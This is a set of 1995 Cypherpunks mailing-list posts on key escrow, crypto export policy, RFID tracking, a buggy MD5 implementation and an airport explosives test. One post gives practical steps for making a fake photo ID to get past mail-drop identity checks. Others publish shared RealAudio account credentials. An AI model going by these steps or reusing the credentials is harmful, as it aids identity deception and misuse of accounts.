way to go, and that, at least to some, credit card transactions using 
weak crypto will be acceptable to most (given the ease of getting CC#s 
other ways)?

Donning my asbestos suit,
And speaking only for myself ...

EBD




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Sun, 20 Aug 95 14:24:33 PDT
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Non-News Govt Announcement on Key Escrow
In-Reply-To: <ac595a311502100481c2@[205.199.118.202]>
Message-ID: <Pine.D-G.3.91.950820171326.14336F-100000@dg.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 17 Aug 1995, Timothy C. May wrote:

> At 9:49 PM 8/17/95, Dave Banisar wrote:
> >The White House and NIST annouced today that they were planning to hold two
> >open meetings next month to develop standards for "acceptable" software key
> >escrow.  The standards will then be made into a FIPS. The programs cannot
> >deletia
> One thing I'm hoping for is that Clinton will, as he contemplates his last
> year and a bit in office, have an attack of "liberalism." That is, I am
> hoping he realizes that any mandatory key escrow system is not only a
> massive infringement on the right of people to speak and communicate as
> they wish, it is also handing the keys to the Surveillance State to the
> likes of Bob Dole, Jesse Helms, Alonse D'Amato, Newt Gingrich, and William
> Bennett.
>
I'm afraid your hope is misplaced; I'm sure he thinks he's got a fighting 
chance for a second term.  And giving up on GAK would be portrayed by the 
Republican right (I know, that's redundant) as being weak on crime.  Not 
gonna happen.

If he's reelected, then you've cause to be hopeful on this and other 
issues ...

 
> --Tim May
> 
> 
> ---------:---------:---------:---------:---------:---------:---------:----
> Timothy C. May            | Crypto Anarchy: encryption, digital money,
> tcmay@got.net (Got net?)  | anonymous networks, digital pseudonyms, zero

EBD




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Sun, 20 Aug 95 14:21:05 PDT
To: bdavis@thepoint.net (Brian Davis)
Subject: Re: Another SSL breakage...
In-Reply-To: <Pine.D-G.3.91.950820165648.14336E-100000@dg.thepoint.net>
Message-ID: <199508202119.RAA12053@hermes.bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain



| So ... has this proven that the banning of strong crypto is the correct 
| way to go, and that, at least to some, credit card transactions using 
| weak crypto will be acceptable to most (given the ease of getting CC#s 
| other ways)?

	No.  Banning strong crypto will not help; those darn furriners
are using it anyway.  What it will mean is that the Information
Infrastructure of the future will bypass the United States, as without
strong cryptography, it is impossible to build a secure architechture.

	Should the United States wish to relagate itself to the status
of a third world nation becuase of terrorists, druge dealers, child
pornorgaphers and money launderers, that is indeed unfortunate.

Adam


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew.Spring@ping.be (Andrew Spring)
Date: Sun, 20 Aug 95 09:27:56 PDT
To: cypherpunks@toad.com
Subject: Re: NSA into antigravity?
Message-ID: <v01510101ac5d1e46d09f@[193.74.217.8]>
MIME-Version: 1.0
Content-Type: text/plain



:
>>
>>On July 19, Gerald Ollman and Robert Wayne, two researchers from the
>>University of Maryland geophysics department were detained in Fort Meade,
>>Maryland, apparently by agents of the National Security Agency, whilst
>>taking measurements of the Earth's gravitational field. After 18 hours of
>>questioning, they were released after being instructed not to discuss the
>>incident. Their equipment and results were not returned.
>>
>>Neither the University nor the NSA has commented on the incident. However,
>>it is believed that Ollman and Wayne were investigating a slight anomaly
>>in the Earth's gravitational field centered around Fort Meade. No reason has
>>been given for their detention.

Missile targeting software depends on good models of the earth's gravity
for accuracy, both for design and for simulation purposes.  Since Ft. Meade
was doubtless the target of many nukes during the cold war (and probably
still is), that may account for them having a bug up their asses on the
subject.

'Course you know the NSA;  the world's largest employer of mathematicians,
the largest purchaser of computer hardware, and the largest consumer of
Thorazine.

--
Thank you VERY much!  You'll be getting a Handsome Simulfax Copy of your
OWN words in the mail soon (and My Reply).
<Andrew.Spring@ping.be> PGP Print: 0529 C9AF 613E 9E49  378E 54CD E232 DF96
   Thank you for question, exit left to Funway.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@escape.com>
Date: Sun, 20 Aug 95 17:11:18 PDT
To: Ford Prefect <remailer@bi-node.zerberus.de>
Subject: Re: your mail
In-Reply-To: <m0sgkM8-0002AfC@bi-node.zerberus.de>
Message-ID: <Pine.BSD/.3.91.950820195401.28752A-100000@escape.com>
MIME-Version: 1.0
Content-Type: text/plain



My my, Delweiler rides high!

=================================================================93=======
 + ^ + |  Ray Arachelian | Amerika: The land of the Freeh. | \-_    _-/  |
  \|/  |sunder@escape.com| Where day by day, yet another   |  \  --  /   |
<--+-->|                 | Constitutional right vanishes.  |6 _\-  -/_  6|
  /|\  |    Just Say     |                                 |----\  /---- | 
 + v + | "No" to the NSA!| Jail the censor, not the author!|     \/      |
=======/---------------------------------------------------------VI------/
      /  I watched and weeped as the Exon bill passed, knowing that yet /
     / another freedom vanished before my eyes.  How soon before we see/
    /a full scale dictatorship in the name of decency? While the rest /
   /of_the_world_fights_FOR_freedom,_our_gov'ment_fights_our_freedom_/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Loofbourrow <loofbour@cis.ohio-state.edu>
Date: Sun, 20 Aug 95 16:59:38 PDT
To: cypherpunks@toad.com
Subject: Secure, reliable (Re: Distributed computing)
In-Reply-To: <14470.9508181605@exe.dcs.exeter.ac.uk>
Message-ID: <199508202359.TAA22611@colon.cis.ohio-state.edu>
MIME-Version: 1.0
Content-Type: text/plain


A couple of months back, someone (Adam Back, perhaps?) made mention of
work on secure, reliable distributed computing on untrusted networks
of untrusted machines. I seem to remember mention of sending out bogus
computations in order to obscure the actual computation being
performed.

I was never able to follow the reference, since all the info available
was the name of a Japanese professor, with no mention of the
university or of any publications I could look up.

Does this work ring a bell with anyone else?

nathan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 20 Aug 95 20:03:00 PDT
To: cypherpunks@toad.com
Subject: Re: A glance at the future of missing child identification
Message-ID: <ac5d434c030210047d03@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:52 PM 8/20/95, Hadmut Danisch wrote:

>These transponders are already used for many year. They inject
>them in pigs and cows to identify them. And some car manufacturers
>put the into the ignition keys as theft protections.

The subcutaneous animal things are only detectable at very short ranges.
Typically, a vet (animal doctor) uses a handheld wand to pick up the
signal. Useful for tracking pets, farm animals, etc.

There has so far been no known uses of this on humans, at least as a matter
of routine. Possibly some developers have tried injecting themselves, for
the usual reasons.

The car system used here in the U.S. is called "Lo-Jack," as in the
opposite of "hijack." I don't see how putting the transponders in ignition
keys would do much to stop theft, but maybe I'm unaware of European
developments. (There are keys with chips in them, acting as electronic
keys, or to make the keys harder to duplicate, but not to track the cars.)

>Technology is not new. Perhaps it is already used for criminals?
>Somewhere I heard that in America criminals are sentenced to stay
>at home because the jails are overfilled. A sender is attached to
>their leg and the police is informed if he leaves his home.

Yes, these exist. Not using the same technology as the transponders used in
pets and livestock, though.

>Perhaps a drug dealer may be more usefull if he moves free and
>has a transponder inside which he doesn't know about, that having
>him in jail.

Not technologically feasible at this time, but maybe in several years. Even
so, it wouldn't be hard for his friends to scan him for bugs.

Sure, some will argue that pseudorandom, very intermittent, frequency-agile
signals could be emitted...I say it's a hard problem to escape detection by
antennas a few centimeters away when the signal has to be detectable by
surveillance antennas at least kilometers away, and more likely tens or
hundreds of kilometers away. The infrastructure of antennas is lacking.

>Here in Germany most department stores have big antennas at the
>doors which are normally used to detect thefts. Perhaps these antennas
>also recognize certain people. You can be sure even criminals go to
>department stores, undergrounds, or bus stations. Some hidden antennas
>and it's easy to be on their track.

Implausible. The theft detectors are not picking up specific transponders,
just the "on" or "off" state of the things attached to clothing, books,
CDs, etc. (I say "things" because some of them are strips inserted in
books, some are tag-like things clamped to clothing, etc.)

Again, the infrastructure is lacking. The simple detectors in stores would
have to be upgraded to track more sophisticated transponders. The stores
would have to cooperate, etc. Implausible.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May            | Crypto Anarchy: encryption, digital money,
tcmay@got.net (Got net?)  | anonymous networks, digital pseudonyms, zero
408-728-0152              | knowledge, reputations, information markets,
Corralitos, CA            | black markets, collapse of governments.
Higher Power: 2^756839    | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@escape.com>
Date: Sun, 20 Aug 95 17:27:52 PDT
To: Mike McNally <m5@dev.tivoli.com>
Subject: Re: CoS Raid on "Copyright Terrorist"
In-Reply-To: <9508151817.AA03464@vail.tivoli.com>
Message-ID: <Pine.BSD/.3.91.950820200557.28752G-100000@escape.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 15 Aug 1995, Mike McNally wrote:

> Ray Cromwell writes:
>  > Nowadays, a $10-20/mo maildrop at places like "Mailboxes, Etc" works fine.
> 
> Mailboxes Etc. insists on getting a picture ID; at least they did last
> time I checked.  Some smaller mom&pop places will take a business card
> (time to break out your Jim Rockford Business Card Fabrication Kit).

Please, all you need is to go down to a computer time rental place that 
has a color scanner and a color printer and you can print any ID you like.
Take a picture of you, scan it in, bring it to a word processor or 
publisher program, write some text next to it like "Anon Y. Mouse Inc.
Joe Sixpack, Vice President of Operations, DOB: 4/1/69" print it, cut the
edges to make it look round, and get it laminated.  Instant I.D.

Worth as much as used toilet paper when it comes to your True Name.

I can do half the operation right now on my home machine.  Just have to 
get the camcorder out and hook it up to the video capture card to get the 
picture, then take it into Publish It Easy, write the text and put the 
picture next to it.  Only thing I'm missing is a color inkjet printer and 
a small laminator, but I can print to a poscript file, take the file to 
Kinko's or wherever and print it there, buy a laminator for $40 and I'm set.

Hell, another $200 and I can get a decent color printer too.

=================================================================93=======
 + ^ + |  Ray Arachelian | Amerika: The land of the Freeh. | \-_    _-/  |
  \|/  |sunder@escape.com| Where day by day, yet another   |  \  --  /   |
<--+-->|                 | Constitutional right vanishes.  |6 _\-  -/_  6|
  /|\  |    Just Say     |                                 |----\  /---- | 
 + v + | "No" to the NSA!| Jail the censor, not the author!|     \/      |
=======/---------------------------------------------------------VI------/
      /  I watched and weeped as the Exon bill passed, knowing that yet /
     / another freedom vanished before my eyes.  How soon before we see/
    /a full scale dictatorship in the name of decency? While the rest /
   /of_the_world_fights_FOR_freedom,_our_gov'ment_fights_our_freedom_/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sun, 20 Aug 95 20:17:19 PDT
To: John Young <cypherpunks@toad.com
Subject: Re: (Fwd) 1995 Nanotechnology Conference
Message-ID: <199508210317.UAA24109@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 11:45 AM 8/19/95 -0400, John Young wrote:
>
>Fourth Foresight Conference on Molecular Nanotechnology



And what does this have to do with cryptography?

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: solman@MIT.EDU
Date: Sun, 20 Aug 95 17:26:47 PDT
To: rah@shipwright.com (Robert Hettinga)
Subject: Legality of suverting computational cycles via Microsoft
In-Reply-To: <v02120d05ac5d6836b779@[199.0.65.105]>
Message-ID: <9508210026.AA01067@ua.MIT.EDU>
MIME-Version: 1.0
Content-Type: text/plain


Does anybody here know if it is illegal to get unwiting users to download
benign viruses via MSN?

Doesn't this sort of hole, by its very nature, make it trivial for people
to violate Europes future electronic privacy laws? (despite Microsoft's
guarantee that MSN would follow those rules.)

JWS




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 20 Aug 95 20:34:02 PDT
To: cypherpunks@toad.com
Subject: Third World Man
Message-ID: <ac5d49b804021004ff37@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


(Wow! I just trimmed 7 of the 8 names cc:ed on this message I'm quoting...I
think the auto-quoting software most of use is getting out of hand. The
trimmed recipients were; To: bdavis@thepoint.net, aba@atlas.ex.ac.uk,
davby@ida.liu.se, Damien.Doligez@inria.fr, hfinney@shell.portal.com,
asb@nexor.co.uk)

Anyway...

At 9:19 PM 8/20/95, Adam Shostack wrote:
>| So ... has this proven that the banning of strong crypto is the correct
>| way to go, and that, at least to some, credit card transactions using
>| weak crypto will be acceptable to most (given the ease of getting CC#s
>| other ways)?
>
>        No.  Banning strong crypto will not help; those darn furriners
>are using it anyway.  What it will mean is that the Information
>Infrastructure of the future will bypass the United States, as without
>strong cryptography, it is impossible to build a secure architechture.
>
>        Should the United States wish to relagate itself to the status
>of a third world nation becuase of terrorists, druge dealers, child
>pornorgaphers and money launderers, that is indeed unfortunate.

The U.S. is not likely to find itself relegated to third world status over
this issue. Rhetorically, I wish it were so, but it just ain't. This
issue--like the McCarthy hearings in the 1950s, the race issue in the '60s,
the Vietnam war in the '60s and '70s, to name a few cases, _sounds_ really
serious. And it is, as those cases were, but predicting the imminent
collapse of American civilization is usually a lose.

There is no way the technologlcal and manufacturing prowess of leading
American companies will be substantially crippled.

I would like to see export laws relaxed, especially as they are seldom
effective, and so on. You know my views.

But the likeliest outcome if strong crypto export remains hard, but import
is unaffected, is that strong crypto will be imported from Europe and
elsewhere.

(It does not violate any laws that I am aware of to have a product for sale
in the U.S. with "hooks" for arbitrary crypto, so long as that product and
the hooks are not _exported_. Naturally, companies like Microsoft, Lotus,
Novell, etc., do not want to have a U.S. version and an export version. But
if they _have_ to, they can. My point is that this would certainly not
relegate the U.S. to Third World status, at least not faster than many
other trends are already doing.)

Several European companies are strong in crypto, of course.

--Tim May


---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May            | Crypto Anarchy: encryption, digital money,
tcmay@got.net (Got net?)  | anonymous networks, digital pseudonyms, zero
408-728-0152              | knowledge, reputations, information markets,
Corralitos, CA            | black markets, collapse of governments.
Higher Power: 2^756839    | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 20 Aug 95 20:46:09 PDT
To: cypherpunks@toad.com
Subject: Re: Secure, reliable (Re: Distributed computing)
Message-ID: <ac5d4f44050210044cf8@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:59 PM 8/20/95, Nathan Loofbourrow wrote:
>A couple of months back, someone (Adam Back, perhaps?) made mention of
>work on secure, reliable distributed computing on untrusted networks
>of untrusted machines. I seem to remember mention of sending out bogus
>computations in order to obscure the actual computation being
>performed.
>
>I was never able to follow the reference, since all the info available
>was the name of a Japanese professor, with no mention of the
>university or of any publications I could look up.
>
>Does this work ring a bell with anyone else?

Joan Feigenbaum, then of Stanford and now of Bell Labs, has worked for many
years on what she calls "computing with encrypted instances."

The canonical example is one where one wishes to send a problem, e.g., a
routing problems a la the Travelling Salesman Problem, to a service for
solving. But one doesn't wish to reveal the cities being considered,
perhaps for business reasons. (The extension of this concern to crypto
should be clear.)

So, one transforms the data set, sends it to the compute services, gets
back and answer, and reverses the transformation.

I've always thought of her work as a kissing cousing to zero knowledge
interactive proof systems, but it evolved along a different path.

A check of her published papers should reveal several summaries. I know
some of her stuff got published in "Crypto Proceedings."

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May            | Crypto Anarchy: encryption, digital money,
tcmay@got.net (Got net?)  | anonymous networks, digital pseudonyms, zero
408-728-0152              | knowledge, reputations, information markets,
Corralitos, CA            | black markets, collapse of governments.
Higher Power: 2^756839    | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sun, 20 Aug 95 18:40:42 PDT
To: cypherpunks@toad.com
Subject: Re: A glance at the future of missing child identification
Message-ID: <199508210136.VAA09171@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <9508202052.AA23832@elysion.iaks.ira.uka.de>,
danisch@ira.uka.de (Hadmut Danisch) wrote:

>These transponders are already used for many year. They inject
>them in pigs and cows to identify them. And some car manufacturers
>put the into the ignition keys as theft protections.

Sure, the technology is nothing new. Still, it deserves our attention.

>
>Technology is not new. Perhaps it is already used for criminals?
>Somewhere I heard that in America criminals are sentenced to stay
>at home because the jails are overfilled. A sender is attached to 
>their leg and the police is informed if he leaves his home.

Yes, this is being done. The programs are expected to be extended, because
housing an inmate is expensive.

>But it might be difficult to hide them on x-ray images...

No need to hide them if they are implated voluntary with the first polio
shot or required for ex-cons.

BTW, is there a futures market that allows you to bet real money?

- -- 
- -- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMDfjCCoZzwIn1bdtAQH7HQGAlqdM9rArQZdn2mYTrOPUHKMQoHPv9sL7
+dwxxBPXSNr0Zr/vdrT/vabc8fHJQSlC
=jraT
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: RealAudio Welcome Wagon <welcome@realaudio.com>
Date: Sun, 20 Aug 95 21:49:43 PDT
To: cypherpunks@toad.com
Subject: RealAudio website temporary password
Message-ID: <199508210449.VAA20788@www.realaudio.com>
MIME-Version: 1.0
Content-Type: text/plain


This is an automatic response to your request for a free user account 
on the RealAudio site. Welcome to the world of RealAudio. 

The following temporary password will only be used once, 
in order to activate the username and password you 
selected for yourself during signup. 
To activate your account, please visit our Account Activation page 
at http://www.RealAudio.com/welcome.html
and enter the temporary password in the proper blank. 

The user name you selected is:    

cypherpu

Your temporary RealAudio password is:    

Toledo.Francisco

If you have trouble with the software, please refer to
 the RealAudio FAQ and Technical Notes available at
 http://www.RealAudio.com/help.html

You can also contact us through http://www.RealAudio.com/comment.html

Thank you for becoming a RealAudio user. 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <mfroomki@umiami.ir.miami.edu>
Date: Sun, 20 Aug 95 19:50:04 PDT
To: MONTY HARDER <monty.harder@famend.com>
Subject: Re: Certificates/Anonymity/Policy/True Names
In-Reply-To: <8AF7577.0003000342.uuout@famend.com>
Message-ID: <Pine.3.89.9508202240.A620945023-0100000@umiami.ir.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


Monty Harder suggests that what the world needs is a CyberNotary.  Fear 
not; the American Bar Association, in cahoots with the U.S. chapter of 
the International Chamber of Commerce, is hard at work at creating 
exactly such a beast.  More details in N weeks, when there are more details.

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | mfroomki@umiami.ir.miami.edu
U. Miami School of Law     | 
P.O. Box 248087            | It's hot here.  And humid.
Coral Gables, FL 33124 USA |
See http://www-swiss.ai.mit.edu/6095/articles/froomkin-metaphor/text.html
and http://www.law.cornell.edu/jol/froomkin.htm





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: danisch@ira.uka.de (Hadmut Danisch)
Date: Sun, 20 Aug 95 13:56:38 PDT
To: cypherpunks@toad.com
Subject: Re: A glance at the future of missing child identification
Message-ID: <9508202052.AA23832@elysion.iaks.ira.uka.de>
MIME-Version: 1.0
Content-Type: text/plain



These transponders are already used for many year. They inject
them in pigs and cows to identify them. And some car manufacturers
put the into the ignition keys as theft protections.

Technology is not new. Perhaps it is already used for criminals?
Somewhere I heard that in America criminals are sentenced to stay
at home because the jails are overfilled. A sender is attached to 
their leg and the police is informed if he leaves his home.

Perhaps a drug dealer may be more usefull if he moves free and
has a transponder inside which he doesn't know about, that having
him in jail. 

Here in Germany most department stores have big antennas at the
doors which are normally used to detect thefts. Perhaps these antennas
also recognize certain people. You can be sure even criminals go to
department stores, undergrounds, or bus stations. Some hidden antennas
and it's easy to be on their track.

But it might be difficult to hide them on x-ray images...


Brrr, disgusting idea...   :-{


Hadmut 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 20 Aug 95 20:10:43 PDT
To: cypherpunks@toad.com
Subject: Re: Basically F-C-ed
Message-ID: <199508210310.XAA03953@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



Responding to msg by usura@replay.com (Alex de Joode) on Mon, 
21 Aug  4:28 AM


>Airport police was very quick to point out that such 
>practices  were legal, now when they do that ......


What, Alex, FC stands for F*cking Counterterrorists, making 
work for themselves?


Oh my, are those bitter out of work XX-cold warriors heeding 
X-feebie Liddy, prolonging the 60's blame-the-radicals payoffs.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 20 Aug 95 20:19:17 PDT
To: cypherpunks@toad.com
Subject: Re: A glance at the future of missing child identification
Message-ID: <199508210319.XAA04795@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


September Wired has an "Updata" on this by Simson Garfinkel, "A 
Chip for Every Child?"


A note says the original story was in Wired 1.6.


Excuse the W-word.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 20 Aug 95 20:38:51 PDT
To: jamesd@echeque.com
Subject: Re: (Fwd) 1995 Nanotechnology Conference
Message-ID: <199508210338.XAA07406@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



Responding to msg by jamesd@echeque.com ("James A. Donald") on 
Sun, 20 Aug  8:17 PM


>And what does this have to do with cryptography?


The topic has come up here several times in connection with 
development of molecular computers. It has been suggested that 
there is a link to Len Adelman's work.


But maybe that was just a transparent cover story.


Perhaps it's actually a molecular part of the Waco Vince Foster 
Tom Clancy Pat Robertson Nuclear Weapons Material divulgation.


Thanks for provoking. What do you think? Your lively 
disputations have been missed.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 20 Aug 95 20:42:15 PDT
To: John Young <jya@pipeline.com>
Subject: Re: Basically F-C-ed
In-Reply-To: <199508210310.XAA03953@pipe2.nyc.pipeline.com>
Message-ID: <199508210342.XAA03482@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Let me just point out that this is starting to get afield...

.pm

John Young writes:
> 
> Responding to msg by usura@replay.com (Alex de Joode) on Mon, 
> 21 Aug  4:28 AM
> 
> 
> >Airport police was very quick to point out that such 
> >practices  were legal, now when they do that ......
> 
> 
> What, Alex, FC stands for F*cking Counterterrorists, making 
> work for themselves?
> 
> 
> Oh my, are those bitter out of work XX-cold warriors heeding 
> X-feebie Liddy, prolonging the 60's blame-the-radicals payoffs.
> 
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Rosenberg" <hal9001@panix.com>
Date: Sun, 20 Aug 95 20:52:24 PDT
To: michael shiplett <walrus@ans.net>
Subject: Re: Sun's buggy MD5?
Message-ID: <v02130508ac5da8006e75@[166.84.254.3]>
MIME-Version: 1.0
Content-Type: text/plain


At 20:45 8/18/95, michael shiplett wrote:
>MD5 test suite:
>MD5 ("") =               f00001c0effffba8429b59d50529097c
>MD5 ("a") =              f00003c0effffba8aec5fcf4284a8dbe
>MD5 ("abc") =            f00005c0effffba896fc8af8ca60a911
>MD5 ("message digest") = f00007c0effffba8f373218f317a9558
>MD5 ("abcdefghijklmnopqrstuvwxyz") = f00009c0effffba896b4f24acb3f4738
>MD5 ("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789")
>= f0000bc0effffba8cef237a614aa457d

There certainly is something VERY wrong. I think that the result is being
reported from a location that is 8 positions left of where it should be
pointing. Position 9 is where the "random" (ie: Probably correct) data
starts. The first 8 positions are f0000Xc0effffba8 (where X increments by 2
for each invocation). Thus this looks like some kind of constant or fixed
work area.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 20 Aug 95 23:56:49 PDT
To: cypherpunks@toad.com
Subject: Re: RealAudio website temporary password
Message-ID: <ac5d7c0b010210048c5e@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:00 AM 8/21/95, Anonymous wrote:
>Oops.  Thank you for changing the password.  Shall we not use writecode
>unless the site does not allow "cypherpunks" as the password?  I get it
>now.

Hey, this business of signing up the "Cypherpunks" list for a bunch of
specialized services is getting old.

As guerilla ontology, it's fine. The problem is that all of these messages
about what the official, public password is are cluttering up the mail here
(
"writecode" is not my idea of an obvious public password).

And some of these public sign-ups generate reflecting messages back to the
list. In terms of scaling, this sucks.

And what's being accomplished?

(I confess that when I first saw this announcement that we had been signed
up with the name "cypherpu" and the temporary passphrase
"Toledo.Francisco," I immediately registered under a different set of
names. Now I see that Lucky Green has done the same thing. Hmhhhh, which
one came first and is recognized by them?)

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May            | Crypto Anarchy: encryption, digital money,
tcmay@got.net (Got net?)  | anonymous networks, digital pseudonyms, zero
408-728-0152              | knowledge, reputations, information markets,
Corralitos, CA            | black markets, collapse of governments.
Higher Power: 2^756839    | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Sun, 20 Aug 95 21:40:54 PDT
To: cypherpunks@toad.com
Subject: Re: Basically F-C-ed
In-Reply-To: <199508210220.EAA03190@utopia.hacktic.nl>
Message-ID: <Pine.SOL.3.91.950821002322.25327B-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain


I don't find it too hard to believe that the Dutch would make a test like 
this.  Security at Schipol can be pretty intense.  I find it a little 
harder to believe that they would goof and let the bomb-oid get away, but 
mistakes happen.  What I find difficult to swallow is that they would 
*tear* the man's luggage to insert the article.

In my experience, the Dutch are almost obsessively careful in taking care 
of their own property and that of others.

FWIW,

BD

On Mon, 21 Aug 1995, Anonymous wrote:

> 
> FBI Probing Planted Explosive
> 
> 
> Orlando, Fla., August 20 (AP) -- Two explosives were
> planted in a professor's suitcase to test airport
> security measures in Amsterdam, The Netherlands, and were
> discovered when he arrived in Orlando, officials said
> Saturday.
> 
> The professor, Paul Holloway of the University of
> Florida, arrived at Orlando International Airport on
> Friday afternoon and found his suitcase had been torn,
> said Brian Kensel, a special agent with the FBI in Tampa.
> 
> He alerted Northwest Airlines security officials who
> emptied his bag and found the two devices. No detonators
> or fuses were with the materials, posing no danger to
> passengers, Kensel said.
> 
[...]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sun, 20 Aug 95 22:16:24 PDT
To: cypherpunks@toad.com
Subject: Re: RealAudio website temporary password
Message-ID: <199508210512.BAA11614@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199508210449.VAA20788@www.realaudio.com>,
welcome@realaudio.com (RealAudio Welcome Wagon) wrote:

>This is an automatic response to your request for a free user account 
>on the RealAudio site. Welcome to the world of RealAudio. 
>
>The following temporary password will only be used once, 
>in order to activate the username and password you 
>selected for yourself during signup. 
>To activate your account, please visit our Account Activation page 
>at http://www.RealAudio.com/welcome.html
>and enter the temporary password in the proper blank. 
>
>The user name you selected is:    
>
>cypherpu

The password has been changed to "cypherpunks"

- -- 
- -- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMDgVmCoZzwIn1bdtAQF6IwF+INj+evDl7CrkIKHTpozs+8yMixV9fEh4
FvaTNdx/Jl/kWoyrjFTk+oYm85DmVv91
=xB75
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sun, 20 Aug 95 19:20:11 PDT
To: cypherpunks@toad.com
Subject: Basically F-C-ed
Message-ID: <199508210220.EAA03190@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



FBI Probing Planted Explosive


Orlando, Fla., August 20 (AP) -- Two explosives were
planted in a professor's suitcase to test airport
security measures in Amsterdam, The Netherlands, and were
discovered when he arrived in Orlando, officials said
Saturday.

The professor, Paul Holloway of the University of
Florida, arrived at Orlando International Airport on
Friday afternoon and found his suitcase had been torn,
said Brian Kensel, a special agent with the FBI in Tampa.

He alerted Northwest Airlines security officials who
emptied his bag and found the two devices. No detonators
or fuses were with the materials, posing no danger to
passengers, Kensel said.

"We were satisfied that he was unaware of its presence
before it was found at the airport," he added.

Holloway had been attending a professional conference in
Finland and had traveled through Detroit, Michigan,
before arriving in Orlando, Kensel said.

He had stopped in Amsterdam on the way, and that was
where the device was placed, said Kathleen Bergen,
spokeswoman with the Federal Aviation Administration in
Atlanta.

"It was part of a test," she said. "Basically the bag was
inadvertently loaded on board with the explosives still
inside."

Kensel said such security measures were normal for
Europe.

"Particularly in Europe, there are grave concerns about
security issues," he said. "As a result, they do conduct
